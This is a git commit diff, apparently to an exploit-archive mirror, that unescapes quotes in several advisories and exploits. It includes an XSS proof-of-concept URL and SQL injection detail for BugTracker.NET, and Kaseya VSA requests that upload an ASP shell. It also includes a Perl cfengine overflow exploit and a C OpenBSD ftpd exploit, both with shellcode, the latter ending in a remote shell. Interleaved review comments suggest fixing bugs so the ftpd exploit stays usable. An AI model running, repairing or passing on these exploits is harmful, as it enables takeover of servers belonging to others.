DB: 2016-10-28
This commit is contained in:
parent
da85686a94
commit
d97b4f7c48
213 changed files with 8307 additions and 8307 deletions
|
@ -34,9 +34,9 @@ scripting and SQL-injection vulnerabilities were found in the following
|
|||
files of the BugTracker.NET:
|
||||
|
||||
. *bugs.aspx*. SQL injection in line 141.
|
||||
. *delete_query.aspx*. No sanitization for \'row_id.Value\' in line 30.
|
||||
. *delete_query.aspx*. No sanitization for 'row_id.Value' in line 30.
|
||||
. *edit_bug.aspx*. Variables without sanitization in lines 1846 and 1857.
|
||||
. *edit_bug.aspx*. No sanitization for variable \'new_project\', line 2214.
|
||||
. *edit_bug.aspx*. No sanitization for variable 'new_project', line 2214.
|
||||
. *edit_bug.aspx*. XSS in line 2918.
|
||||
. *edit_comment.aspx*. XSS in line 233.
|
||||
. *edit_customfield.aspx*. Lines 165 and 172, no sanitization.
|
||||
|
@ -68,7 +68,7 @@ and Alejandro Frydman from Core Security Technologies.
|
|||
|
||||
[CVE-2010-3266 | N/A]. All XSS vulnerabilities can be exploited in
|
||||
similar ways. The following proof of concept shows how to exploit the
|
||||
XSS founded in \'edit_comment.aspx\':
|
||||
XSS founded in 'edit_comment.aspx':
|
||||
|
||||
/-----
|
||||
...
|
||||
|
@ -76,9 +76,9 @@ XSS founded in \'edit_comment.aspx\':
|
|||
231 <table border=0><tr><td>
|
||||
232
|
||||
233 <a href=edit_bug.aspx?id=<%
|
||||
Response.Write(Request[\"bug_id\"]);%>>back to <%
|
||||
Response.Write(btnet.Util.get_setting(\"SingularBugLabel\",\"bug\")); %></a>
|
||||
234 <form class=frm runat=\"server\">
|
||||
Response.Write(Request["bug_id"]);%>>back to <%
|
||||
Response.Write(btnet.Util.get_setting("SingularBugLabel","bug")); %></a>
|
||||
234 <form class=frm runat="server">
|
||||
235
|
||||
236 <table border=0>
|
||||
...
|
||||
|
@ -89,30 +89,30 @@ bug. Then, edit it using this URL:
|
|||
/-----
|
||||
http://localhost:4535/edit_comment.aspx?id=48&bug_id=3%3E%3Cscript%3Ealert%28%27%27%29;%3C/script%3E
|
||||
-----/
|
||||
As a result, the JavaScript code injected into the parameter \'bug_id\'
|
||||
As a result, the JavaScript code injected into the parameter 'bug_id'
|
||||
will be rendered without sanitization in the line 233, and executed in
|
||||
the context of the client\'s web browser.
|
||||
the context of the client's web browser.
|
||||
|
||||
|
||||
7.2. *SQL Injection Vulnerabilities*
|
||||
|
||||
[CVE-2010-3267 | N/A]. All SQL injection vulnerabilities can also be
|
||||
exploited in similar ways. Consider, for example, the code located in
|
||||
\'delete_query.aspx\':
|
||||
'delete_query.aspx':
|
||||
|
||||
/-----
|
||||
...
|
||||
26 if (IsPostBack)
|
||||
27 {
|
||||
28 // do delete here
|
||||
29 sql = @\"delete queries where qu_id = $1\";
|
||||
30 sql = sql.Replace(\"$1\", row_id.Value);
|
||||
29 sql = @"delete queries where qu_id = $1";
|
||||
30 sql = sql.Replace("$1", row_id.Value);
|
||||
31 btnet.DbUtil.execute_nonquery(sql);
|
||||
32 Server.Transfer (\"queries.aspx\");
|
||||
32 Server.Transfer ("queries.aspx");
|
||||
33 }
|
||||
...
|
||||
-----/
|
||||
In line 30, the value of \'row_id\' is injected without sanitization into
|
||||
In line 30, the value of 'row_id' is injected without sanitization into
|
||||
the SQL query. This value arrives to the server in a hidden field of a
|
||||
client request. As a result, a malicious user can manipulate this value
|
||||
in order to execute code in the database layer of the application.
|
||||
|
@ -170,7 +170,7 @@ project information and shared software tools for public use at:
|
|||
|
||||
Core Security Technologies develops strategic solutions that help
|
||||
security-conscious organizations worldwide develop and maintain a
|
||||
proactive process for securing their networks. The company\'s flagship
|
||||
proactive process for securing their networks. The company's flagship
|
||||
product, CORE IMPACT, is the most comprehensive product for performing
|
||||
enterprise security assurance testing. CORE IMPACT evaluates network,
|
||||
endpoint and end-user vulnerabilities and identifies what resources are
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
Kaseya VSA is an IT management platform for small and medium corporates.
|
||||
From its console you can control thousands of computers and mobile
|
||||
devices. So that if you own the Kaseya server, you own the organisation.
|
||||
With this post I\'m also releasing two Metasploit modules ([E1], [E2])
|
||||
With this post I'm also releasing two Metasploit modules ([E1], [E2])
|
||||
and a Ruby file ([E3]) that exploit the vulnerabilities described below.
|
||||
|
||||
A special thanks to ZDI for assisting with the disclosure of these
|
||||
|
@ -28,12 +28,12 @@ Security (http://www.agileinfosec.co.uk/)
|
|||
Disclosure: 23/09/2015 / Last updated: 28/09/2015
|
||||
|
||||
>> Background on the affected product:
|
||||
\"Kaseya VSA is an integrated IT Systems Management platform that can be
|
||||
"Kaseya VSA is an integrated IT Systems Management platform that can be
|
||||
leveraged seamlessly across IT disciplines to streamline and automate
|
||||
your IT services. Kaseya VSA integrates key management capabilities into
|
||||
a single platform. Kaseya VSA makes your IT staff more productive, your
|
||||
services more reliable, your systems more secure, and your value easier
|
||||
to show.\"
|
||||
to show."
|
||||
|
||||
A special thanks to ZDI for assisting with the vulnerability reporting
|
||||
process.
|
||||
|
@ -52,7 +52,7 @@ VSA Version 9.0.0.0 â?? 9.0.0.18
|
|||
VSA Version 9.1.0.0 â?? 9.1.0.8
|
||||
|
||||
GET /LocalAuth/setAccount.aspx
|
||||
Page will attempt to redirect, ignore this and obtain the \"sessionVal\"
|
||||
Page will attempt to redirect, ignore this and obtain the "sessionVal"
|
||||
value from the page which will be used in the following POST request.
|
||||
|
||||
POST /LocalAuth/setAccount.aspx
|
||||
|
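Review bot: the context line `VSA Version 9.1.0.0 â?? 9.1.0.8` (and the hunk header `VSA Version 9.0.0.0 â?? 9.0.0.18`) still carries mojibake where the advisory's version-range dash was; this sweep only turns `\"` into `"` and leaves the encoding damage in place. Since the file is being rewritten anyway, run the same pass with a UTF-8 repair, or replace the `â??` sequence with a plain `-`, so the affected-version lines are readable.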
@ -85,7 +85,7 @@ Cookie: sessionId=<sessionID>
|
|||
<... ASP shell here...>
|
||||
|
||||
The path needs to be correct, but Kaseya is helpful enough to let us
|
||||
know when a path doesn\'t exist.
|
||||
know when a path doesn't exist.
|
||||
A Metasploit module that exploits this vulnerability has been released.
|
||||
|
||||
#3
|
||||
|
@ -108,20 +108,20 @@ boundary=---------------------------114052411119142
|
|||
Content-Length: 1501
|
||||
|
||||
-----------------------------114052411119142
|
||||
Content-Disposition: form-data; name=\"directory\"
|
||||
Content-Disposition: form-data; name="directory"
|
||||
|
||||
../WebPages
|
||||
-----------------------------114052411119142
|
||||
Content-Disposition: form-data; name=\"ReferringWebWindowId\"
|
||||
Content-Disposition: form-data; name="ReferringWebWindowId"
|
||||
|
||||
31a5d16a-01b7-4f8d-adca-0b2e70006dfa
|
||||
-----------------------------114052411119142
|
||||
Content-Disposition: form-data; name=\"request\"
|
||||
Content-Disposition: form-data; name="request"
|
||||
|
||||
uploadFile
|
||||
-----------------------------114052411119142
|
||||
Content-Disposition: form-data; name=\"impinf__uploadfilelocation\";
|
||||
filename=\"shell.asp\"
|
||||
Content-Disposition: form-data; name="impinf__uploadfilelocation";
|
||||
filename="shell.asp"
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
<... ASP shell here...>
|
||||
|
|
|
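Review bot: the `Content-Disposition` header for the `impinf__uploadfilelocation` part is split across two lines (`...name="impinf__uploadfilelocation";` / `filename="shell.asp"`) in both the old and the new text. Unless the second line is indented as an obsolete HTTP line fold, a literal replay of this request will not parse as a file part and the upload fails; while the file is being touched, join the two lines into a single header line.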
@ -5,37 +5,37 @@
|
|||
|
||||
use IO::Socket;
|
||||
if(!$ARGV[1])
|
||||
{ print \"usage: ./DSR-cfengine.pl <host> <port> (default cfengine is 5308)\\n\"; exit(-1); }
|
||||
{ print "usage: ./DSR-cfengine.pl <host> <port> (default cfengine is 5308)\n"; exit(-1); }
|
||||
|
||||
$host = $ARGV[0];
|
||||
$port = $ARGV[1];
|
||||
$nop = \"\\x90\";
|
||||
$ret = pack(\"l\",0xbfafe3dc);
|
||||
$nop = "\x90";
|
||||
$ret = pack("l",0xbfafe3dc);
|
||||
$shellcode =
|
||||
\"\\x31\\xc0\\x31\\xdb\\x53\\xb3\\x06\\x53\\xb3\\x01\\x53\\xb3\\x02\\x53\\x54\\xb0\".
|
||||
\"\\x61\\xcd\\x80\\x89\\xc7\\x31\\xc0\\x50\\x50\\x50\\x66\\x68\\xb0\\xef\\xb7\\x02\".
|
||||
\"\\x66\\x53\\x89\\xe1\\x31\\xdb\\xb3\\x10\\x53\\x51\\x57\\x50\\xb0\\x68\\xcd\\x80\".
|
||||
\"\\x31\\xdb\\x39\\xc3\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\x50\\x57\".
|
||||
\"\\x50\\xb0\\x6a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x50\\x89\\xe1\\xb3\\x01\\x53\\x89\".
|
||||
\"\\xe2\\x50\\x51\\x52\\xb3\\x14\\x53\\x50\\xb0\\x2e\\xcd\\x80\\x31\\xc0\\x50\\x50\".
|
||||
\"\\x57\\x50\\xb0\\x1e\\xcd\\x80\\x89\\xc6\\x31\\xc0\\x31\\xdb\\xb0\\x02\\xcd\\x80\".
|
||||
\"\\x39\\xc3\\x75\\x44\\x31\\xc0\\x57\\x50\\xb0\\x06\\xcd\\x80\\x31\\xc0\\x50\\x56\".
|
||||
\"\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x43\\x53\\x56\\x50\\xb0\\x5a\\xcd\".
|
||||
\"\\x80\\x31\\xc0\\x43\\x53\\x56\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x50\\x68\\x2f\".
|
||||
\"\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x54\\x53\\x50\\xb0\\x3b\".
|
||||
\"\\xcd\\x80\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\x56\\x50\\xb0\\x06\\xcd\\x80\".
|
||||
\"\\xeb\\x9a\";
|
||||
"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0".
|
||||
"\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02".
|
||||
"\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80".
|
||||
"\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57".
|
||||
"\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89".
|
||||
"\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50".
|
||||
"\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80".
|
||||
"\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56".
|
||||
"\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd".
|
||||
"\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f".
|
||||
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b".
|
||||
"\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80".
|
||||
"\xeb\x9a";
|
||||
|
||||
|
||||
$buf = $nop x 2222 . $shellcode . $ret x 500;
|
||||
|
||||
$socket = new IO::Socket::INET (
|
||||
Proto => \"tcp\",
|
||||
Proto => "tcp",
|
||||
PeerAddr => $host,
|
||||
PeerPort => $port,
|
||||
);
|
||||
|
||||
die \"unable to connect to $host:$port ($!)\\n\" unless $socket;
|
||||
die "unable to connect to $host:$port ($!)\n" unless $socket;
|
||||
|
||||
sleep(1); #you might have to adjust this on slow connections
|
||||
print $socket $buf;
|
||||
|
|
|
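Review bot: this hunk is the first place the sweep turns `\\` into `\` (`$nop = \"\\x90\"` to `$nop = "\x90"`, plus the 13 shellcode lines and the `\\n` in the usage string). That is right for this file, because every `\\` here is an escaped backslash left by the earlier over-escaping and the Perl source needs a single backslash. It is worth confirming the script limits itself to that case: a file that legitimately contains `\\` in source (a Windows path in a C string literal, a regex inside a Python string) would be corrupted by a blanket `\\` to `\` replace. A spot check of the 213 changed files for lines that still contain `\\` after the change, and for lines where a `\\` was reduced next to a non-escape character, would catch that.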
@ -40,22 +40,22 @@ int verbose = 0;
|
|||
|
||||
|
||||
/*
|
||||
Written by dvorak, garbled up by \"Smegma\" with a word xor 0xaabb mask
|
||||
Written by dvorak, garbled up by "Smegma" with a word xor 0xaabb mask
|
||||
to get rid of dots and slashes.
|
||||
*/
|
||||
|
||||
char heavenlycode[] =
|
||||
\"\\x31\\xc0\\x89\\xc1\\x80\\xc1\\x02\\x51\\x50\\x04\\x5a\\x50\\xcd\\x80\"
|
||||
\"\\xeb\\x10\\x5e\\x31\\xc9\\xb1\\x4a\\x66\\x81\\x36\\xbb\\xaa\\x46\\x46\\xe2\\xf7\\xeb\\x05\\xe8\\xeb\\xff\\xff\\xff\\xff\\xff\\xff\\x50\\xcf\\xe5\\x9b\\x7b\\xf
|
||||
a\\xbf\\xbd\\xeb\\x67\\x3b\\xfc\\x8a\\x6a\\x33\\xec\\xba\\xae\\x33\\xfa\\x76\\x2a\\x8a\\x6a\\xeb\\x22\\xfd\\xb5\\x36\\xf4\\xa5\\xf9\\xbf\\xaf\\xeb\\x67\\x3b\\x2
|
||||
3\\x7a\\xfc\\x8a\\x6a\\xbf\\x97\\xeb\\x67\\x3b\\xfb\\x8a\\x6a\\xbf\\xa4\\xf3\\xfa\\x76\\x2a\\x36\\xf4\\xb9\\xf9\\x8a\\x6a\\xbf\\xa6\\xeb\\x67\\x3b\\x27\\xe5\\xb
|
||||
4\\xe8\\x9b\\x7b\\xae\\x86\\xfa\\x76\\x2a\\x8a\\x6a\\xeb\\x22\\xfd\\x8d\\x36\\xf4\\x93\\xf9\\x36\\xf4\\x9b\\x23\\xe5\\x82\\x32\\xec\\x97\\xf9\\xbf\\x91\\xeb\\x6
|
||||
7\\x3b\\x42\\x2d\\x55\\x44\\x55\\xfa\\xeb\\x95\\x84\\x94\\x84\\x95\\x85\\x95\\x84\\x94\\x84\\x95\\x85\\x95\\x84\\x94\\x84\\x95\\x85\\x95\\x84\\x94\\x84\\x95\\x8
|
||||
5\\x95\\x84\\x94\\x84\\x95\\xeb\\x94\\xc8\\xd2\\xc4\\x94\\xd9\\xd3\";
|
||||
"\x31\xc0\x89\xc1\x80\xc1\x02\x51\x50\x04\x5a\x50\xcd\x80"
|
||||
"\xeb\x10\x5e\x31\xc9\xb1\x4a\x66\x81\x36\xbb\xaa\x46\x46\xe2\xf7\xeb\x05\xe8\xeb\xff\xff\xff\xff\xff\xff\x50\xcf\xe5\x9b\x7b\xf
|
||||
a\xbf\xbd\xeb\x67\x3b\xfc\x8a\x6a\x33\xec\xba\xae\x33\xfa\x76\x2a\x8a\x6a\xeb\x22\xfd\xb5\x36\xf4\xa5\xf9\xbf\xaf\xeb\x67\x3b\x2
|
||||
3\x7a\xfc\x8a\x6a\xbf\x97\xeb\x67\x3b\xfb\x8a\x6a\xbf\xa4\xf3\xfa\x76\x2a\x36\xf4\xb9\xf9\x8a\x6a\xbf\xa6\xeb\x67\x3b\x27\xe5\xb
|
||||
4\xe8\x9b\x7b\xae\x86\xfa\x76\x2a\x8a\x6a\xeb\x22\xfd\x8d\x36\xf4\x93\xf9\x36\xf4\x9b\x23\xe5\x82\x32\xec\x97\xf9\xbf\x91\xeb\x6
|
||||
7\x3b\x42\x2d\x55\x44\x55\xfa\xeb\x95\x84\x94\x84\x95\x85\x95\x84\x94\x84\x95\x85\x95\x84\x94\x84\x95\x85\x95\x84\x94\x84\x95\x8
|
||||
5\x95\x84\x94\x84\x95\xeb\x94\xc8\xd2\xc4\x94\xd9\xd3";
|
||||
|
||||
char user[255] = \"anonymous\";
|
||||
char pass[255] = \"anonymous@abc.com\";
|
||||
char write_dir[PATH_MAX] = \"/\";
|
||||
char user[255] = "anonymous";
|
||||
char pass[255] = "anonymous@abc.com";
|
||||
char write_dir[PATH_MAX] = "/";
|
||||
int ftpport = 21;
|
||||
unsigned long int ret_addr = 0;
|
||||
#define CMD_LOCAL 0
|
||||
|
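Review bot: the `heavenlycode[]` literal is wrapped mid-escape in both the old and the new text: one line ends in `\x7b\xf` and the next starts with `a\xbf`, so the unescaped file still does not compile (an unterminated string literal at each wrap point). The wrap is inherited from the source, not introduced here, but since this pass is already rewriting these lines it would be the natural place to re-join the broken string lines; the same applies to the `Usage:` string in the next hunk, which is cut between `[-c command]` and `[-C command]\n\n"`.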
@ -70,24 +70,24 @@ struct typeT {
|
|||
|
||||
#define NUM_TYPES 2
|
||||
struct typeT types[NUM_TYPES] = {
|
||||
\"OpenBSD 2.6\", 0xdfbfd0ac,
|
||||
\"OpenBSD 2.7\", 0xdfbfd0ac};
|
||||
"OpenBSD 2.6", 0xdfbfd0ac,
|
||||
"OpenBSD 2.7", 0xdfbfd0ac};
|
||||
|
||||
void
|
||||
usage(char *program)
|
||||
{
|
||||
int i;
|
||||
fprintf(stderr,
|
||||
\"\\nUsage: %s [-h host] [-f port] [-u user] [-p pass] [-d directory] [-t type]\\n\\t\\t[-r retaddr] [-c command]
|
||||
[-C command]\\n\\n\"
|
||||
\"Directory should be an absolute path, writable by the user.\\n\"
|
||||
\"The argument of -c will be executed on the remote host\\n\"
|
||||
\"while the argument of -C will be executed on the local\\n\"
|
||||
\"with its filedescriptors connected to the remote host\\n\"
|
||||
\"Valid types:\\n\",
|
||||
"\nUsage: %s [-h host] [-f port] [-u user] [-p pass] [-d directory] [-t type]\n\t\t[-r retaddr] [-c command]
|
||||
[-C command]\n\n"
|
||||
"Directory should be an absolute path, writable by the user.\n"
|
||||
"The argument of -c will be executed on the remote host\n"
|
||||
"while the argument of -C will be executed on the local\n"
|
||||
"with its filedescriptors connected to the remote host\n"
|
||||
"Valid types:\n",
|
||||
program);
|
||||
for (i = 0; i < NUM_TYPES; i++) {
|
||||
printf(\"%d : %s\\n\", i, types[i].name);
|
||||
printf("%d : %s\n", i, types[i].name);
|
||||
}
|
||||
exit(-1);
|
||||
}
|
||||
|
@ -98,54 +98,54 @@ main(int argc, char **argv)
|
|||
unsigned int i;
|
||||
int opt, fd;
|
||||
unsigned int type = 0;
|
||||
char *hostname = \"localhost\";
|
||||
char *hostname = "localhost";
|
||||
|
||||
if (argc < 2)
|
||||
usage(argv[0]);
|
||||
|
||||
while ((opt = getopt(argc, argv, \"h:r:u:f:d:t:vp:c:C:\")) != -1) {
|
||||
while ((opt = getopt(argc, argv, "h:r:u:f:d:t:vp:c:C:")) != -1) {
|
||||
switch (opt) {
|
||||
case \'h\':
|
||||
case 'h':
|
||||
hostname = optarg;
|
||||
break;
|
||||
case \'C\':
|
||||
case 'C':
|
||||
command = optarg;
|
||||
command_type = CMD_LOCAL;
|
||||
break;
|
||||
case \'c\':
|
||||
case 'c':
|
||||
command = optarg;
|
||||
command_type = CMD_REMOTE;
|
||||
break;
|
||||
case \'r\':
|
||||
case 'r':
|
||||
ret_addr = strtoul(optarg, NULL, 0);
|
||||
break;
|
||||
case \'v\':
|
||||
case 'v':
|
||||
verbose++;
|
||||
break;
|
||||
case \'f\':
|
||||
case 'f':
|
||||
if (!(ftpport = atoi(optarg))) {
|
||||
fprintf(stderr, \"Invalid destination port - %s\\n\", optarg);
|
||||
fprintf(stderr, "Invalid destination port - %s\n", optarg);
|
||||
exit(-1);
|
||||
}
|
||||
exit(-1);
|
||||
break;
|
||||
case \'u\':
|
||||
case 'u':
|
||||
strncpy(user, optarg, sizeof(user) - 1);
|
||||
user[sizeof(user) - 1] = 0x00;
|
||||
break;
|
||||
case \'p\':
|
||||
case 'p':
|
||||
strncpy(pass, optarg, sizeof(pass) - 1);
|
||||
pass[sizeof(pass) - 1] = 0x00;
|
||||
break;
|
||||
case \'d\':
|
||||
case 'd':
|
||||
strncpy(write_dir, optarg, sizeof(write_dir) - 1);
|
||||
write_dir[sizeof(write_dir) - 1] = 0x00;
|
||||
if ((write_dir[0] != \'/\'))
|
||||
if ((write_dir[0] != '/'))
|
||||
usage(argv[0]);
|
||||
if ((write_dir[strlen(write_dir) - 1] != \'/\'))
|
||||
strncat(write_dir, \"/\", sizeof(write_dir) - 1);
|
||||
if ((write_dir[strlen(write_dir) - 1] != '/'))
|
||||
strncat(write_dir, "/", sizeof(write_dir) - 1);
|
||||
break;
|
||||
case \'t\':
|
||||
case 't':
|
||||
type = atoi(optarg);
|
||||
if (type > NUM_TYPES)
|
||||
usage(argv[0]);
|
||||
|
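Review bot: unrelated to the quote unescaping but visible in the context of this hunk: in `case 'f':` the unconditional `exit(-1);` sitting between the `if (!(ftpport = atoi(optarg)))` block and `break;` means any use of `-f port` terminates the program, and `if (type > NUM_TYPES)` should be `>=`, since `types[NUM_TYPES]` is one past the end of the array. Neither is changed by this commit; if the intent is to keep the exploit usable rather than archival, both are one-line fixes.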
@ -160,7 +160,7 @@ main(int argc, char **argv)
|
|||
if ((fd = xconnect(hostname, ftpport)) == -1)
|
||||
exit(-1);
|
||||
else
|
||||
printf(\"Connected to remote host! Sending evil codes.\\n\");
|
||||
printf("Connected to remote host! Sending evil codes.\n");
|
||||
|
||||
|
||||
ftp_login(fd, user, pass);
|
||||
|
@ -178,19 +178,19 @@ ftp_cmd_err(int fd, char *command, char *param, char *res, int size, char * msg)
|
|||
if (res == NULL)
|
||||
return 0;
|
||||
if (verbose)
|
||||
printf(\"%s\\n\", res);
|
||||
if (msg && (res[0] != \'2\')) {
|
||||
fprintf(stderr, \"%s\\n\", msg);
|
||||
printf("%s\n", res);
|
||||
if (msg && (res[0] != '2')) {
|
||||
fprintf(stderr, "%s\n", msg);
|
||||
exit(-1);
|
||||
}
|
||||
return (res[0] != \'2\');
|
||||
return (res[0] != '2');
|
||||
}
|
||||
|
||||
void shell(int fd)
|
||||
{
|
||||
fd_set readfds;
|
||||
char buf[1];
|
||||
char *tst = \"echo ; echo ; echo HAVE FUN ; id ; uname -a\\n\";
|
||||
char *tst = "echo ; echo ; echo HAVE FUN ; id ; uname -a\n";
|
||||
|
||||
write(fd, tst, strlen(tst));
|
||||
while (1) {
|
||||
|
@ -200,14 +200,14 @@ void shell(int fd)
|
|||
select(fd + 1, &readfds, NULL, NULL, NULL);
|
||||
if (FD_ISSET(0, &readfds)) {
|
||||
if (read(0, buf, 1) != 1) {
|
||||
perror(\"read\");
|
||||
perror("read");
|
||||
exit(1);
|
||||
}
|
||||
write(fd, buf, 1);
|
||||
}
|
||||
if (FD_ISSET(fd, &readfds)) {
|
||||
if (read(fd, buf, 1) != 1) {
|
||||
perror(\"read\");
|
||||
perror("read");
|
||||
exit(1);
|
||||
}
|
||||
write(1, buf, 1);
|
||||
|
@ -228,7 +228,7 @@ void do_command(int fd)
|
|||
exit (2);
|
||||
}
|
||||
write(fd, command, strlen(command));
|
||||
write(fd, \"\\n\", 1);
|
||||
write(fd, "\n", 1);
|
||||
while ((len = read(fd, buffer, sizeof(buffer))) > 0) {
|
||||
write(1, buffer, len);
|
||||
}
|
||||
|
@ -242,10 +242,10 @@ void execute_command(fd)
|
|||
int exploit_ok(int fd)
|
||||
{
|
||||
char result[1024];
|
||||
xsend(fd, \"id\\n\");
|
||||
xsend(fd, "id\n");
|
||||
|
||||
xrecieve(fd, result, sizeof(result));
|
||||
return (strstr(result, \"uid=\") != NULL);
|
||||
return (strstr(result, "uid=") != NULL);
|
||||
}
|
||||
|
||||
void exploit(int fd)
|
||||
|
@ -254,49 +254,49 @@ void exploit(int fd)
|
|||
int heavenlycode_s;
|
||||
char *dir = NULL;
|
||||
|
||||
ftp_cmd_err(fd, \"CWD\", write_dir, res, 1024, \"Can\'t CWD to write_dir\");
|
||||
ftp_cmd_err(fd, "CWD", write_dir, res, 1024, "Can't CWD to write_dir");
|
||||
|
||||
dir = strcreat(dir, \"A\", 255 - strlen(write_dir));
|
||||
ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\");
|
||||
dir = strcreat(dir, "A", 255 - strlen(write_dir));
|
||||
ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
|
||||
xfree(&dir);
|
||||
|
||||
/* next on = 256 */
|
||||
|
||||
dir = strcreat(dir, \"A\", 255);
|
||||
ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\");
|
||||
dir = strcreat(dir, "A", 255);
|
||||
ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
|
||||
xfree(&dir);
|
||||
/* next on = 512 */
|
||||
|
||||
heavenlycode_s = strlen(heavenlycode);
|
||||
dir = strcreat(dir, \"A\", 254 - heavenlycode_s);
|
||||
dir = strcreat(dir, "A", 254 - heavenlycode_s);
|
||||
dir = strcreat(dir, heavenlycode, 1);
|
||||
ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\");
|
||||
ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
|
||||
xfree(&dir);
|
||||
/* next on = 768 */
|
||||
|
||||
dir = strcreat(dir, longToChar(ret_addr), 252 / 4);
|
||||
ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\");
|
||||
ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
|
||||
xfree(&dir);
|
||||
/* length = 1020 */
|
||||
|
||||
/* 1022 moet \" zijn */
|
||||
dir = strcreat(dir, \"AAA\\\"\", 1);
|
||||
ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\");
|
||||
/* 1022 moet " zijn */
|
||||
dir = strcreat(dir, "AAA\"", 1);
|
||||
ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
|
||||
xfree(&dir);
|
||||
|
||||
/* and tell it to blow up */
|
||||
ftp_cmd_err(fd, \"PWD\", NULL, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, "PWD", NULL, res, 1024, NULL);
|
||||
|
||||
if (!exploit_ok(fd)) {
|
||||
if (command != NULL) {
|
||||
exit (2);
|
||||
}
|
||||
fprintf(stderr, \"Exploit failed\\n\");
|
||||
fprintf(stderr, "Exploit failed\n");
|
||||
exit (1);
|
||||
}
|
||||
if (command == NULL)
|
||||
|
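Review bot: `dir = strcreat(dir, \"AAA\\\"\", 1);` becoming `dir = strcreat(dir, "AAA\"", 1);` is the case a naive unescaper gets wrong, and the new text has it right: the C literal needs the inner `\"` to survive, so exactly one level of escaping is removed. The Dutch comment above it, `/* 1022 moet " zijn */`, reads "byte 1022 must be a `"`" and explains why the literal ends in a quote. Worth keeping this hunk as the regression case for the script, since a second pass over the repository would strip the remaining backslash.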
@ -346,7 +346,7 @@ xrealloc(void *ptr, size_t size)
|
|||
char *wittgenstein_was_a_drunken_swine;
|
||||
|
||||
if (!(wittgenstein_was_a_drunken_swine = (char *) realloc(ptr, size))) {
|
||||
fprintf(stderr, \"Cannot calculate universe\\n\");
|
||||
fprintf(stderr, "Cannot calculate universe\n");
|
||||
exit(-1);
|
||||
}
|
||||
return (wittgenstein_was_a_drunken_swine);
|
||||
|
@ -367,7 +367,7 @@ xmalloc(size_t size)
|
|||
char *heidegger_was_a_boozy_beggar;
|
||||
|
||||
if (!(heidegger_was_a_boozy_beggar = (char *) malloc(size))) {
|
||||
fprintf(stderr, \"Out of cheese error\\n\");
|
||||
fprintf(stderr, "Out of cheese error\n");
|
||||
exit(-1);
|
||||
}
|
||||
return (heidegger_was_a_boozy_beggar);
|
||||
|
@ -382,7 +382,7 @@ xconnect(char *host, u_short port)
|
|||
int fd;
|
||||
|
||||
if ((he = gethostbyname(host)) == NULL) {
|
||||
perror(\"gethostbyname\");
|
||||
perror("gethostbyname");
|
||||
return (-1);
|
||||
}
|
||||
memset(&s_in, 0, sizeof(s_in));
|
||||
|
@ -391,11 +391,11 @@ xconnect(char *host, u_short port)
|
|||
memcpy(&s_in.sin_addr.s_addr, he->h_addr, he->h_length);
|
||||
|
||||
if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
|
||||
perror(\"socket\");
|
||||
perror("socket");
|
||||
return (-1);
|
||||
}
|
||||
if (connect(fd, (const struct sockaddr *) & s_in, sizeof(s_in)) == -1) {
|
||||
perror(\"connect\");
|
||||
perror("connect");
|
||||
return (-1);
|
||||
}
|
||||
return fd;
|
||||
|
@ -409,20 +409,20 @@ ftp_login(int fd, char *user, char *password)
|
|||
int rep;
|
||||
xrecieveall(fd, reply, sizeof(reply));
|
||||
if (verbose) {
|
||||
printf(\"Logging in ..\\n\");
|
||||
printf(\"%s\\n\", reply);
|
||||
printf("Logging in ..\n");
|
||||
printf("%s\n", reply);
|
||||
